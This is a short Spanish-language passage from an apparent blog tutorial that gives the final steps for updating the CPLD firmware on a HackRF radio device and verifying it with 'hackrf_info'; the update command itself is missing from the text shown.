4. Con la HackRF conectada y reconocida por el sistema, ejecute el siguiente comando para actualizar el CPLD:


Cuando termine notara al cabo de unos segundos que 3 Leds parpadeando, presiona el botón RESET del la HackRF y una vez cargue,  vuelva desconecte y conecte nuevamente el dispositivo a través del puerto USB.

5.  Si todo marcho bien solo queda ejecutar nuevamente el comando "hackrf_info" para verificar que la actualización fue exitosa


En caso de problemas con la actualización, puede reiniciar el dispositivo en modo DFU o Flashear el Firmware, procedimientos explicados en la página oficial.


Bueno amigos, es todo hasta la proxima

thdJca @jcaitf

Viewing all 217 articles
Browse latest View live